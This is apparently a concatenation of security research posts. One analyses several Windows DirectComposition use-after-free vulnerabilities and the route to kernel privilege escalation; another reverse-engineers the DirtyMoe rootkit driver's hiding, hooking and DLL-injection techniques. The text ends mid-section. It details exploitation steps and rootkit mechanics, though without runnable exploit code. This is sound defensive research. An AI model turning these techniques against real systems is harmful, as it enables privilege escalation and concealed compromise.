In summary we have described more about the vulnerability and how it can be triggered. We have seen how WNF can be leveraged to enable a novel set of exploit primitive. That is all for now in part 1! In the next blog I will cover reliability improvements, kernel memory clean up and continuation.

Analysis of DirectComposition Binding and Tracker object vulnerability

DirectComposition introduction

Microsoft DirectComposition is a Windows component that enables high-performance bitmap composition with transforms, effects, and animations. Application developers can use the DirectComposition API to create visually engaging user interfaces that feature rich and fluid animated transitions from one visual to another.[1]

DirectComposition API provides COM interface via dcomp.dll, calls win32kbase.sys through win32u.dll export function, and finally sends data to client program dwm.exe (Desktop Window Manager) through ALPC to complete the graphics rendering operation:
avatar

win32u.dll (Windows 10 1909) provides the following export functions to handle DirectComposition API:
avatar

The three functions related to trigger vulnerability are: NtDCompositionCreateChannel,NtDCompositionProcessChannelBatchBuffer and NtDCompositionCommitChannel:
(1) NtDCompositionCreateChannel creates a channel to communicate with the kernel:

typedef NTSTATUS(*pNtDCompositionCreateChannel)(
	OUT PHANDLE hChannel,
	IN OUT PSIZE_T pSectionSize,
	OUT PVOID* pMappedAddress
	);

(2) NtDCompositionProcessChannelBatchBuffer batches multiple commands:

typedef NTSTATUS(*pNtDCompositionProcessChannelBatchBuffer)(
    IN HANDLE hChannel,
    IN DWORD dwArgStart,
    OUT PDWORD pOutArg1,
    OUT PDWORD pOutArg2
    );

The batched commands are stored in the pMappedAddress memory returned by NtDCompositionCreateChannel. The command list is as follows:

enum DCOMPOSITION_COMMAND_ID
{
	ProcessCommandBufferIterator,
	CreateResource,
	OpenSharedResource,
	ReleaseResource,
	GetAnimationTime,
	CapturePointer,
	OpenSharedResourceHandle,
	SetResourceCallbackId,
	SetResourceIntegerProperty,
	SetResourceFloatProperty,
	SetResourceHandleProperty,
	SetResourceHandleArrayProperty,
	SetResourceBufferProperty,
	SetResourceReferenceProperty,
	SetResourceReferenceArrayProperty,
	SetResourceAnimationProperty,
	SetResourceDeletedNotificationTag,
	AddVisualChild,
	RedirectMouseToHwnd,
	SetVisualInputSink,
	RemoveVisualChild
};

The commands related to trigger vulnerability are: CreateResource, SetResourceBufferProperty, ReleaseResource. The data structure of different commands is different:
avatar

(3) NtDCompositionCommitChannel serializes batch commands and sends them to dwm.exe for rendering through ALPC:

typedef NTSTATUS(*pNtDCompositionCommitChannel)(
	IN HANDLE hChannel,
	OUT PDWORD out1,
	OUT PDWORD out2,
	IN DWORD flag,
	IN HANDLE Object
	);


CInteractionTrackerBindingManagerMarshaler::SetBufferProperty process analysis

First use CreateResource command to create CInteractionTrackerBindingManagerMarshaler resource (ResourceType = 0x59, hereinafter referred to as “Binding”) and CInteractionTrackerMarshaler resource (ResourceType = 0x58, hereinafter referred to as “Tracker”).
Then call the SetResourceBufferProperty command to set the Tracker object to the Binding object’s BufferProperty.
This process is handled by the function CInteractionTrackerBindingManagerMarshaler::SetBufferProperty, which main process is as follows:
avatar

The key steps are as follows:
(1) Check the input buffer subcmd == 0 && bufsize == 0xc
(2) Get Tracker objects tracker1 and tracker2 from channel-> resource_list (+0x38) according to the resourceId in the input buffer
(3) Check whether the types of tracker1 and tracker2 are CInteractionTrackerMarshaler (0x58)
(4) If binding->entry_count (+0x50) > 0, find the matched TrackerEntry from binding->tracker_list (+0x38) according to the handleID of tracker1 and tracker2, then update TrackerEntry->entry_id to the new_entry_id from the input buffer
(5) Otherwise, create a new TrackerEntry structure. If tracker1->binding == NULL || tracker2->binding == NULL, update their binding objects

After SetBufferProperty, a reference relationship between the binding object and the tracker object is as follows:
avatar

When use ReleaseResource command to release the Tracker object, the CInteractionTrackerMarshaler::ReleaseAllReferencescalled function is called. ReleaseAllReferences checks whether the tracker object has a binding object internally:
avatar

If it has:
(1) Call RemoveTrackerBindings. In RemoveTrackerBindings, TrackerEntry.entry_id is set to 0 if the resourceID in tracker_list is equal to the resourceID of the freed tracker. Then call CleanUpListItemsPendingDeletion to delete the TrackerEntry which entry_id=0 in tracker_list:
avatar

(2) Call ReleaseResource to set refcnt of the binding object minus 1.
avatar

(3) tracker->binding (+0x190) = 0

According to the above process, the input command buffer to construct a normal SetBufferProperty process is as follows:
avatar

After SetBufferProperty, the memory layout of binding1 and tacker1, tracker2 objects is as follows:
avatar

After ReleaseResource tracker2, the memory layout of binding1, tacker1, and tracker2 objects is as follows:
avatar

CVE-2020-1381

Retrospective the process of CInteractionTrackerBindingManagerMarshaler::SetBufferProperty, when new_entry_id != 0, a new TrackerEntry structure will be created:
avatar

If tracker1 and tracker2 have been bound to binding1 already, after binding tracker1 and tracker2 to binding2, a new TrackerEntry structure will be created for binding2. Since tracker->binding != NULL at this time, tracker->binding will still save binding1 pointer and will not be updated to binding2 pointer. When the tracker is released, binding2->entry_list will retain the tracker’s dangling pointer.

Construct an input command buffer which can trigger the vulnerability as follows:
avatar

Memory layout after ReleaseResource tracker1:
avatar

It can be seen that after ReleaseResource tracker1, binding2->track_list[0] saves the dangling pointer of tracker1.

CVE-2021-26900

According to analyze the branch of ‘the new_entry_id != 0’, the root cause of CVE-2020-1381 is when creating TrackerEntry, it didn’t check the tracker object which has been bound to the binding object. The patch adds a check for tracker->binding when creating TrackerEntry:
avatar

CVE-2021-26900 is a bypass of the CVE-2020-1381 patch. The key point to bypass the patch is if the condition of tracker->binding==NULL can be constructed after the tracker is bound to the binding object.
The way to bypass is in the ‘update TrackerEntry’ branch:
avatar

When TrackerEntry->entry_id == 0, RemoveBindingManagerReferenceFromTrackerIfNecessary function is called. It checks if entry_id==0 internally, then call SetBindingManagerMarshaler to set tracker->binding=NULL:
avatar

Therefore, by setting entry_id=0 manually, the status of tracker->binding == NULL can be obtained, which can be used to bypass the CVE-2020-1381 patch.

Construct an input command buffer which can trigger the vulnerability as follows:
avatar

After setting entry_id=0 manually, the memory layout of binding1 and tracker1:
avatar

At this time, binding1->TrackerEntry still saves the pointer of tracker1, but tracker1->binding = NULL. Memory layout after ReleaseResource tracker1: avatar

It can be seen that after ReleaseResource tracker1, binding1->track_list[0] saves the dangling pointer of tracker1.

CVE-2021-26868

Retrospective the method in CVE-2021-26900 which sets entry_id=0 manually to get tracker->binding == NULL status to bypass the CVE-2020-1381 patch and the process of CInteractionTrackerMarshaler::ReleaseAllReferences:ReleaseAllReferences which checks that if the tracker object has a binding object, and then deletes the corresponding TrackerEntry.

So when entry_id is set to 0 manually, tracker->binding will be set to NULL. When the tracker object is released via ReleaseResource command, the TrackerEntry saved by the binding object will not be deleted, then a dangling pointer of the tracker object will be obtained again.

Construct an input command buffer which can trigger the vulnerability as follows:
avatar

Memory layout after ReleaseResource tracker1:
avatar

It can be seen that after ReleaseResource tracker1, binding1->track_list[0] saves the dangling pointer of tracker1.

CVE-2021-33739

CVE-2021-33739 is different from the vulnerability in win32kbase.sys introduced in previous sections. It is a UAF vulnerability in dwmcore.dll of the dwm.exe process. The root cause is in ReleaseResource phase of CloseChannel. In CInteractionTrackerBindingManager::RemoveTrackerBinding function call, when the element Binding->hashmap(+0x40) is deleted, the hashmap is accessed directly without checking whether the Binding object is released, which causes the UAF vulnerability.

Construct an input command buffer which can trigger the vulnerability as follows:
avatar

According to the previous analysis, in the normal scenario of CInteractionTrackerBindingManagerMarshaler::SetBufferProperty function call, the Binding object should be bound with two different Tracker objects. However, if it is bound with the same Tracker object:

(1) Binding phase:
CInteractionTrackerBindingManager::ProcessSetTrackerBindingMode function is called to process binding opreation, which calls CInteractionTrackerBindingManager::AddOrUpdateTrackerBindings function internally to update Tracker->Binding (+0x278). When Tracker has already be bound with the current Binding object, the binding operation will not be repeated:
avatar

Therefore, if the same Tracker object is bound already, the Binding object will not be bound again, then the refcnt of the Binding object will only be increased by 1 finally: avatar

(2) Release phase:
After PreRender is finished, CComposition::CloseChannel will be called to close the Channel and release the Resource in the Resource HandleTable. The Binding object will be released firstly, at this time Binding->refcnt = 1:
avatar

Then the Tracker object will be released. CInteractionTrackerBindingManager::RemoveTrackerBindings will be called to release Tracker->Binding:
avatar

Three steps are included:
(1) Get the Tracker object from the TrackerEntry
(2) Erase the corresponding Tracker pointer from Binding->hashmap (+0x40)
(3) Remove Tracker->Binding (Binding->refcnt –) from the Tracker object

The key problem is: After completing the cleanup of the first Tracker object in TrackerEntry, the Binding object may be released already. When the second Tracker object is prepared to be cleared, because the Binding object has been released, the validity of the Binding object does not be checked before the Binding->hashmap is accessed again, which result in an access vialation exception:
avatar

Exploitation: Another way to occupy freed memory

For the kernel object UAF exploitation, according to the publicly available exploit samples[5], the Palette object is used to occupy the freed memory:
avatar

Use CInteractionTrackerBindingManagerMarshaler::EmitBoundTrackerMarshalerUpdateCommands function to access the placeholder objects:
avatar

The red box here is the virtual function CInteractionTrackerMarshaler::EmitUpdateCommands of tracker1, tracker2 object (vtable + 0x50). Because the freed Tracker object has been reused by Palette, the program execution flow hijacking is achieved by forging a virtual table and writing other function pointers to fake Tracker vtable+0x50.
The sample selects nt!SeSetAccessStateGenericMapping:
avatar

With the 16-byte write capability of nt!SeSetAccessStateGenericMapping, it modifies _KTHREAD->PreviousMode = 0 to inject shellcode into Winlogon process to complete the privilege escalation.

Another way to occupy freed memory

The exploitation of Palette object is relatively common, is there some object with user-mode controllable memory size in the DirectComposition component can be exploited?

The Binding object and Tracker object we discussed before are belonged to the Resource of DirectComposition. DirectComposition contains many Resource objects, which are created by DirectComposition::CApplicationChannel::CreateInternalResource:
avatar

Each Resource has a BufferProperty, which is set by SetResourceBufferProperty command. So our object is to find one Resource which can be used to allocate a user-mode controllable memory size through the SetResourceBufferProperty command. Through searching, I found CTableTransferEffectMarshaler::SetBufferProperty. The command format is as follows:
avatar

When subcmd==0, the bufferProperty is stored at CTableTransferEffectMarshaler+0x58. The size of the bufferProperty is set by the user-mode input bufferSize, and the content is copied from the user-mode input buffer:
avatar

Modify the original sample and use the propertyBuffer of CTableTransferEffectMarshaler to occupy freed memory:
avatar
avatar

By debugging, we can see that the propertyBuffer of CTableTransferEffectMarshaler occupies the freed memory successfully:
avatar

Finally, successful exploitation screenshot:
avatar

References

[1] https://docs.microsoft.com/en-us/windows/win32/directcomp/directcomposition-portal
[2] https://www.zerodayinitiative.com/blog/2021/5/3/cve-2021-26900-privilege-escalation-via-a-use-after-free-vulnerability-in-win32k
[3] https://github.com/thezdi/PoC/blob/master/CVE-2021-26900/CVE-2021-26900.c
[4] https://ti.dbappsecurity.com.cn/blog/articles/2021/06/09/0day-cve-2021-33739/
[5] https://github.com/Lagal1990/CVE-2021-33739-POC

DirtyMoe: Rootkit Driver

Abstract

In the first post DirtyMoe: Introduction and General Overview of Modularized Malware, we have described one of the complex and sophisticated malware called DirtyMoe. The main observed roles of the malware are Cryptojacking and DDoS attacks that are still popular. There is no doubt that malware has been released for profit, and all evidence points to Chinese territory. In most cases, the PurpleFox campaign is used to exploit vulnerable systems where the exploit gains the highest privileges and installs the malware via the MSI installer. In short, the installer misuses Windows System Event Notification Service (SENS) for the malware deployment. At the end of the deployment, two processes (workers) execute malicious activities received from well-concealed C&C servers.

As we mentioned in the first post, every good malware must implement a set of protection, anti-forensics, anti-tracking, and anti-debugging techniques. One of the most used techniques for hiding malicious activity is using rootkits. In general, the main goal of the rootkits is to hide itself and other modules of the hosted malware on the kernel layer. The rootkits are potent tools but carry a high risk of being detected because the rootkits work in the kernel-mode, and each critical bug leads to BSoD.

The primary aim of this next article is to analyze rootkit techniques that DirtyMoe uses. The main part of this study examines the functionality of a DirtyMoe driver, aiming to provide complex information about the driver in terms of static and dynamic analysis. The key techniques of the DirtyMoe rootkit can be listed as follows: the driver can hide itself and other malware activities on kernel and user mode. Moreover, the driver can execute commands received from the user-mode under the kernel privileges. Another significant aspect of the driver is an injection of an arbitrary DLL file into targeted processes. Last but not least is the driver’s functionality that censors the file system content. In the same way, we describe the refined routine that deploys the driver into the kernel and which anti-forensic method the malware authors used.

Another essential point of this research is the investigation of the driver’s meta-data, which showed that the driver is code-signed with the certificates that have been stolen and revoked in the past. However, the certificates are widespread in the wild and are misused in other malicious software in the present.

Finally, the last part summarises the rootkit functionally and draws together the key findings of digital certificates, making a link between DirtyMoe and other malicious software. In addition, we discuss the implementation level and sources of the used rootkit techniques.

1. Sample

The subject of this research is a sample with SHA-256:
AABA7DB353EB9400E3471EAAA1CF0105F6D1FAB0CE63F1A2665C8BA0E8963A05
The sample is a windows driver that DirtyMoe drops on the system startup.

Note: VirusTotal keeps a record of 44 of 71 AV engines (62 %) which detect the samples as malicious. On the other hand, the DirtyMoe DLL file is detected by 86 % of registered AVs. Therefore, the detection coverage is sufficient since the driver is dumped from the DLL file.

Basic Information
  • File Type: Portable Executable 64
  • File Info: Microsoft Visual C++ 8.0 (Driver)
  • File Size: 116.04 KB (118824 bytes)
  • Digital Signature: Shanghai Yulian Software Technology Co., Ltd. (上海域联软件技术有限公司)
Imports

The driver imports two libraries FltMgr and ntosrnl. Table 1 summarizes the most suspicious methods from the driver’s point.

Routine Description
FltSetCallbackDataDirty A minifilter driver’s pre or post operation calls the routine to indicate that it has modified the contents of the callback data structure.
FltGetRequestorProcessId Routine returns the process ID for the process requested for a given I/O operation.
FltRegisterFilter FltRegisterFilter registers a minifilter driver.
ZwDeleteValueKey
ZwSetValueKey
ZwQueryValueKey
ZwOpenKey
Routines delete, set, query, and open registry entries in kernel-mode.
ZwTerminateProcess Routine terminates a process and all of its threads in kernel-mode.
ZwQueryInformationProcess Retrieves information about the specified process.
MmGetSystemRoutineAddress Returns a pointer to a function specified by a routine parameter.
ZwAllocateVirtualMemory Reserves a range of application-accessible virtual addresses in the specified process in kernel-mode.
Table 1. Kernel methods imported by the DirtyMoe driver

At first glance, the driver looks up kernel routine via MmGetSystemRoutineAddress() as a form of obfuscation since the string table contains routine names operating with VirtualMemory; e.g., ZwProtectVirtualMemory(), ZwReadVirtualMemory(), ZwWriteVirtualMemory(). The kernel-routine ZwQueryInformationProcess() and strings such as services.exe, winlogon.exe point out that the rootkit probably works with kernel structures of the critical windows processes.

2. DirtyMoe Driver Analysis

The DirtyMoe driver does not execute any specific malware activities. However, it provides a wide scale of rootkit and backdoor techniques. The driver has been designed as a service support system for the DirtyMoe service in the user-mode.

The driver can perform actions originally needed with high privileges, such as writing a file into the system folder, writing to the system registry, killing an arbitrary process, etc. The malware in the user-mode just sends a defined control code, and data to the driver and it provides higher privilege actions.

Further, the malware can use the driver to hide some records helping to mask malicious activities. The driver affects the system registry, and can conceal arbitrary keys. Moreover, the system process services.exe is patched in its memory, and the driver can exclude arbitrary services from the list of running services. Additionally, the driver modifies the kernel structures recording loaded drivers, so the malware can choose which driver is visible or not. Therefore, the malware is active, but the system and user cannot list the malware records using standard API calls to enumerate the system registry, services, or loaded drivers. The malware can also hide requisite files stored in the file system since the driver implements a mechanism of the minifilter. Consequently, if a user requests a record from the file system, the driver catches this request and can affect the query result that is passed to the user.

The driver consists of 10 main functionalities as Table 2 illustrates.

Function Description
Driver Entry routine called by the kernel when the driver is loaded.
Start Routine is run as a kernel thread restoring the driver configuration from the system registry.
Device Control processes system-defined I/O control codes (IOCTLs) controlling the driver from the user-mode.
Minifilter Driver routine completes processing for one or more types of I/O operations; QueryDirectory in this case. In other words, the routine filters folder enumerations.
Thread Notification routine registers a driver-supplied callback that is notified when a new thread is created.
Callback of NTFS Driver wraps the original callback of the NTFS driver for IRP_MJ_CREATE major function.
Registry Hiding is hook method provides registry key hiding.
Service Hiding is a routine hiding a defined service.
Driver Hiding is a routine hiding a defined driver.
Driver Unload routine is called by kernel when the driver is unloaded.
Table 2. Main driver functionality

Most of the implemented functionalities are available as public samples on internet forums. The level of programming skills is different for each driver functionality. It seems that the driver author merged the public samples in most cases. Therefore, the driver contains a few bugs and unused code. The driver is still in development, and we will probably find other versions in the wild.

2.1 Driver Entry

The Driver Entry is the first routine that is called by the kernel after driver loading. The driver initializes a large number of global variables for the proper operation of the driver. Firstly, the driver detects the OS version and setups required offsets for further malicious use. Secondly, the variable for pointing of the driver image is initialized. The driver image is used for hiding a driver. The driver also associates the following major functions:

  1. IRP_MJ_CREATE, IRP_MJ_CLOSE – no interest action,
  2. IRP_MJ_DEVICE_CONTROL – used for driver configuration and control,
  3. IRP_MJ_SHUTDOWN – writes malware-defined data into the disk and registry.

The Driver Entry creates a symbolic link to the driver and tries to associate it with other malicious monitoring or filtering callbacks. The first one is a minifilter activated by the FltRegisterFilter() method registering the FltPostOperation(); it filters access to the system drives and allows it to hide files and directories.

Further, the initialization method swaps a major function IRP_MJ_CREATE for \FileSystem\Ntfs driver. So, each API call of CreateFile() or a kernel-mode function IoCreateFile() can be monitored and affected by the malicious MalNtfsCreatCallback() callback.

Another Driver Entry method sets a callback method using PsSetCreateThreadNotifyRoutine(). The NotifyRoutine() monitors a kernel process creation, and the malware can inject malicious code into newly created processes/threads.

Finally, the driver tries to restore its configuration from the system registry.

2.2 Start Routine

The Start Routine is run as a kernel system thread created in the Driver Entry routine. The Start Routine writes the driver version into the SYSTEM registry as follows:

  • Key: HKLM\SYSTEM\CurrentControlSet\Control\WinApi\WinDeviceVer
  • Value: 20161122

If the following SOFTWARE registry key is present, the driver loads artifacts needed for the process injecting:

  • HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\Secure

The last part of Start Routine loads the rest of the necessary entries from the registry. The complete list of the system registry is documented in Appendix A.

2.3 Device Control

The device control is a mechanism for controlling a loaded driver. A driver receives the IRP_MJ_DEVICE_CONTROL I/O control code (IOCTL) if a user-mode thread calls Win32 API DeviceIoControl(); visit [1] for more information. The user-mode application sends IRP_MJ_DEVICE_CONTROL directly to a specific device driver. The driver then performs the corresponding operation. Therefore, malicious user-mode applications can control the driver via this mechanism.

The driver supports approx. 60 control codes. We divided the control codes into 3 basic groups: controlling, inserting, and setting.

Controlling

There are 9 main control codes invoking driver functionality from the user-mode. The following Table 3 summarizes controlling IOCTL that can be sent by malware using the Win32 API.

IOCTL Description
0x222C80 The driver accepts other IOCTLs only if the driver is activated. Malware in the user-mode can activate the driver by sending this IOCTL and authorization code equal 0xB6C7C230.
0x2224C0  The malware sends data which the driver writes to the system registry. A key, value, and data type are set by Setting control codes.
used variable: regKey, regValue, regData, regType
0x222960 This IOCTL clears all data stored by the driver.
used variable: see Setting and Inserting variables
0x2227EC If the malware needs to hide a specific driver, the driver adds a specific driver name to the
listBaseDllName and hides it using Driver Hiding.
0x2227E8 The driver adds the name of the registry key to the WinDeviceAddress list and hides this key
using Registry Hiding.
used variable: WinDeviceAddress
0x2227F0 The driver hides a given service defined by the name of the DLL image. The name is inserted into the listServices variable, and the Service Hiding technique hides the service in the system.
0x2227DC If the malware wants to deactivate the Registry Hiding, the driver restores the original kernel
GetCellRoutine().
0x222004 The malware sends a process ID that wants to terminate. The driver calls kernel function
ZwTerminateProcess() and terminates the process and all of its threads regardless of malware privileges.
0x2224C8 The malware sends data which driver writes to the file defined by filePath variable; see Setting control codes
used variable: filePath, fileData
Table 3. Controlling IOCTLs
Inserting

There are 11 control codes inserting items into white/blacklists. The following Table 4 summarizes variables and their purpose.

White/Black list Variable Purpose
Registry HIVE WinDeviceAddress Defines a list of registry entries that the malware wants to hide in the system.
Process Image File Name WinDeviceMaker Represents a whitelist of processes defined by process image file name. It is used in Callback of NTFS Driver, and grants access to the NTFS file systems. Further, it operates in Minifilter Driver and prevents hiding files defined in the WinDeviceNumber variable. The last use is in Registry Hiding; the malware does not hide registry keys for the whitelisted processes.
WinDeviceMakerB Defines a whitelist of processes defined by process image file name. It is used in Callback of NTFS Driver, and grants access to the NTFS file systems.
WinDeviceMakerOnly Specifies a blacklist of processes defined by the process image file name. It is used in Callback of NTFS Driver and refuses access to the NTFS file systems.
File names
(full path)
WinDeviceName
WinDeviceNameB
Determines a whitelist of files that should be granted access by Callback of NTFS Driver. It is used in combination with WinDeviceMaker and WinDeviceMakerB. So, if a file is on the whitelist and a requested process is also whitelisted, the driver grants access to the file.
WinDeviceNameOnly Defines a blacklist of files that should be denied access by Callback of NTFS Driver. It is used in combination with WinDeviceMakerOnly. So, if a file is on the blacklist and a requesting process is also blacklisted, the driver refuses access to the file.
File names
(containing number)
WinDeviceNumber Defines a list of files that should be hidden in the system by Minifilter Driver. The malware uses a name convention as follows: [A-Z][a-z][0-9]+\.[a-z]{3}. So, a file name includes a number.
Process ID ListProcessId1 Defines a list of processes requiring access to NTFS file systems. The malware does not restrict the access for these processes; see Callback of NTFS Driver.
ListProcessId2 The same purpose as ListProcessId1. Additionally, it is used as the whitelist for the registry hiding, so the driver does not restrict access. The Minifilter Driver does not limit processes in this list.
Driver names listBaseDllName Defines a list of drivers that should be hidden in the system;
see Driver Hiding.
Service names listServices Specifies a list of services that should be hidden in the system;
see Service Hiding.
Table 4. White and Black lists
Setting

The setting control codes store scalar values as a global variable. The following Table 5 summarizes and groups these variables and their purpose.

Function Variable Description
File Writing
(Shutdown)
filename1_for_ShutDown
data1_for_ShutDown
Defines a file name and data for the first file written during the driver shutdown.
filename2_for_ShutDown
data2_for_ShutDown
Defines a file name and data for the second file written during the driver shutdown.
Registry Writing
(Shutdown)
regKey1_shutdown
regValue1_shutdown
regData1_shutdown
regType1
Specifies the first registry key path, value name, data, and type (REG_BINARY, REG_DWORD, REG_SZ, etc.) written during the driver shutdown.
regKey2_shutdown
regValue2_shutdown
regData2_shutdown
regType2
Specifies the second registry key path, value name, data, and type (REG_BINARY, REG_DWORD, REG_SZ, etc.) written during the driver shutdown.
File Data Writing filePath Determines filename which will be used to write data;
see Controlling IOCTL 0x2224C8.
Registry Writing regKey
regValue
regType
Specifies registry key path, value name, and type (REG_BINARY, REG_DWORD, REG_SZ, etc.);
see Controlling IOCTL 0x2224C0.
Unknow
(unused)
dwWinDevicePathA
dwWinDeviceDataA
Keeps a path and data for file A.
dwWinDevicePathB
dwWinDeviceDataB
Keeps a path and data for file B.
Table 5. Global driver variables

The following Table 6 summarizes variables used for the process injection; see Thread Notification.

Function Variable Description
Process to Inject dwWinDriverMaker2
dwWinDriverMaker2_2
Defines two command-line arguments. If a process with one of the arguments is created, the driver should inject the process.
dwWinDriverMaker1
dwWinDriverMaker1_2
Defines two process names that should be injected if the process is created.
DLL to Inject dwWinDriverPath1
dwWinDriverDataA
Specifies a file name and data for the process injection defined by dwWinDriverMaker2 or dwWinDriverMaker1.
dwWinDriverPath1_2
dwWinDriverDataA_2
Defines a file name and data for the process injection defined by dwWinDriverMaker2_2 or dwWinDriverMaker1_2.
dwWinDriverPath2
dwWinDriverDataB
Keeps a file name and data for the process injection defined by dwWinDriverMaker2 or dwWinDriverMaker1.
dwWinDriverPath2_2
dwWinDriverDataB_2
Specifies a file name and data for the process injection defined by dwWinDriverMaker2_2 or dwWinDriverMaker1_2.
Table 6. Injection variables

2.4 Minifilter Driver

The minifilter driver is registered in the Driver Entry routine using the FltRegisterFilter() method. One of the method arguments defines configuration (FLT_REGISTRATION) and callback methods (FLT_OPERATION_REGISTRATION). If the QueryDirectory system request is invoked, the malware driver catches this request and processes it by its FltPostOperation().

The FltPostOperation() method can modify a result of the QueryDirectory operations (IRP). In fact, the malware driver can affect (hide, insert, modify) a directory enumeration. So, some applications in the user-mode may not see the actual image of the requested directory.

The driver affects the QueryDirectory results only if a requested process is not present in whitelists. There are two whitelists. The first whitelists (Process ID and File names) cause that the QueryDirectory results are not modified if the process ID or process image file name, requesting the given I/O operation (QueryDirectory), is present in the whitelists. It represents malware processes that should have access to the file system without restriction. The further whitelist is called WinDeviceNumber, defining a set of suffixes. The FltPostOperation() iterates each item of the QueryDirectory. If the enumerated item name has a suffix defined in the whitelist, the driver removes the item from the QueryDirectory results. It ensures that the whitelisted files are not visible for non-malware processes [2]. So, the driver can easily hide an arbitrary directory/file for the user-mode applications, including explorer.exe. The name of the WinDeviceNumber whitelist is probably derived from malware file names, e.g, Ke145057.xsl, since the suffix is a number; see Appendix B.

2.5 Callback of NTFS Driver

When the driver is loaded, the Driver Entry routine modifies the system driver for the NTFS filesystem. The original callback method for the IRP_MJ_CREATE major function is replaced by a malicious callback MalNtfsCreatCallback() as Figure 1 illustrates. The malicious callback determines what should gain access and what should not.

Figure 1. Rewrite IRP_MJ_CREATE callback of the regular NTFS driver

The malicious callback is active only if the Minifilter Driver registration has been done and the original callback has been replaced. There are whitelists and one blacklist. The whitelists store information about allowed process image names, process ID, and allowed files. If the process requesting the disk access is whitelisted, then the requested file must also be on the white list. It is double protection. The blacklist is focused on processing image names. Therefore, the blacklisted processes are denied access to the file system. Figure 2 demonstrates the whitelisting of processes. If a process is on the whitelist, the driver calls the original callback; otherwise, the request ends with access denied.

Figure 2. Grant access to whitelisted processes

In general, if the malicious callback determines that the requesting process is authorized to access the file system, the driver calls the original IRP_MJ_CREATE major function. If not, the driver finishes the request as STATUS_ACCESS_DENIED.

2.6 Registry Hiding

The driver can hide a given registry key. Each manipulation with a registry key is hooked by the kernel method GetCellRoutine(). The configuration manager assigns a control block for each open registry key. The control block (CM_KEY_CONTROL_BLOCK) structure keeps all control blocks in a hash table to quickly search for existing control blocks. The GetCellRoutine() hook method computes a memory address of a requested key. Therefore, if the malware driver takes control over the GetCellRoutine(), the driver can filter which registry keys will be visible; more precisely, which keys will be searched in the hash table.

The malware driver finds an address of the original GetCellRoutine() and replaces it with its own malicious hook method, MalGetCellRoutine(). The driver uses well-documented implementation [3, 4]. It just goes through kernel structures obtained via the ZwOpenKey() kernel call. Then, the driver looks for CM_KEY_CONTROL_BLOCK, and its associated HHIVE structured correspond with the requested key. The HHIVE structure contains a pointer to the GetCellRoutine() method, which the driver replaces; see Figure 3.

Figure 3. Overwriting GetCellRoutine

This method’s pitfall is that offsets of looked structure, variable, or method are specific for each windows version or build. So, the driver must determine on which Windows version the driver runs.

The MalGetCellRoutine() hook method performs 3 basic operations as follow:

  1. The driver calls the original kernel GetCellRoutine() method.
  2. Checks whitelists for a requested registry key.
  3. Catches or releases the requested registry key according to the whitelist check.
Registry Key Hiding

The hiding technique uses a simple principle. The driver iterates across a whole HIVE of a requested key. If the driver finds a registry key to hide, it returns the last registry key of the iterated HIVE. When the interaction is at the end of the HIVE, the driver does not return the last key since it was returned before, but it just returns NULL, which ends the HIVE searching.

The consequence of this principle is that if the driver wants to hide more than one key, the driver returns the last key of the searched HIVE more times. So, the final results of the registry query can contain duplicate keys.

Whitelisting

The services.exe and System services are whitelisted by default, and there is no restriction. Whitelisted process image names are also without any registry access restriction.

A decision-making mechanism is more complicated for Windows 10. The driver hides the request key only for regedit.exe application if the Windows 10 build is 14393 (July 2016) or 15063 (March 2017).

2.7 Thread Notification

The main purpose of the Thread Notification is to inject malicious code into created threads. The driver registers a thread notification routine via PsSetCreateThreadNotifyRoutine() during the Device Entry initialization. The routine registers a callback which is subsequently notified when a new thread is created or deleted. The suspicious callback (PCREATE_THREAD_NOTIFY_ROUTINE) NotifyRoutine() takes three arguments: ProcessID, ThreadID, and Create flag. The driver affects only threads in which Create flag is set to TRUE, so only newly created threads.

The whitelisting is focused on two aspects. The first one is an image name, and the second one is command-line arguments of a created thread. The image name is stored in WinDriverMaker1, and arguments are stored as a checksum in the WinDriverMaker2 variable. The driver is designed to inject only two processes defined by a process name and two processes defined by command line arguments. There are no whitelists, just 4 global variables.

2.7.1 Kernel Method Lookup

The successful injection of the malicious code requires several kernel methods. The driver does not call these methods directly due to detection techniques, and it tries to obfuscate the required method. The driver requires the following kernel methods: ZwReadVirtualMemory, ZwWriteVirtualMemory, ZwQueryVirtualMemory, ZwProtectVirtualMemory, NtTestAlert, LdrLoadDll

The kernel methods are needed for successful thread injection because the driver needs to read/write process data of an injected thread, including program instruction.

Virtual Memory Method Lookup

The driver gets the address of the ZwAllocateVirtualMemory() method. As Figure 4 illustrates, all lookup methods are consecutively located after ZwAllocateVirtualMemory() method in ntdll.dll.

Figure 4. Code segment of ntdll.dll with VirtualMemory methods

The driver starts to inspect the code segments from the address of the ZwAllocateVirtualMemory() and looks up for instructions representing the constant move to eax (e.g. mov eax, ??h). It identifies the VirtualMemory methods; see Table 7 for constants.

Constant Method
0x18 ZwAllocateVirtualMemory
0x23 ZwQueryVirtualMemory
0x3A NtWriteVirtualMemory
0x50 ZwProtectVirtualMemory
Table 7. Constants of Virtual Memory methods for Windows 10 (64 bit)

When an appropriate constants is found, the final address of a lookup method is calculated as follow:

method_address = constant_address - alignment_constant;
where alignment_constant helps to point to the start of the looked-up method.

The steps to find methods can be summarized as follow:

  1. Get the address of ZwAllocateVirtualMemory(), which is not suspected in terms of detection.
  2. Each sought method contains a specific constant on a specific address (constant_address).
  3. If the constant_address is found, another specific offset (alignment_constant) is subtracted;
    the alignment_constant is specific for each Windows version.

The exact implementation of the Virtual Memory Method Lookup method  is shown in Figure 5.

Figure 5. Implementation of the lookup routine searching for the kernel VirtualMemory methods

The success of this obfuscation depends on the Window version identification. We found one Windows 7 version which returns different methods than the malware wants; namely, ZwCompressKey(), ZwCommitEnlistment(), ZwCreateNamedPipeFile(), ZwAlpcDeleteSectionView().
The alignment_constant is derived from the current Windows version during the driver initialization; see the Driver Entry routine.

NtTestAlert and LdrLoadDll Lookup

A different approach is used for getting NtTestAlert() and LdrLoadDll() routines. The driver attaches to the winlogon.exe process and gets the pointer to the kernel structure PEB_LDR_DATA containing PE header and imports of all processes in the system. If the import table includes a required method, then the driver extracts the base address, which is the entry point to the sought routine.

2.7.2 Process Injection

The aim of the process injection is to load a defined DLL library into a new thread via kernel function LdrLoadDll(). The process injection is slightly different for x86 and x64 OS versions.

The x64 OS version abuses the original NtTestAlert() routine, which checks the thread’s APC queue. The APC (Asynchronous Procedure Call) is a technique to queue a job to be done in the context of a specific thread. It is called periodically. The driver rewrites the instructions of the NtTestAlert() which jumps to the entry point of the malicious code.

Modification of NtTestAlert Code

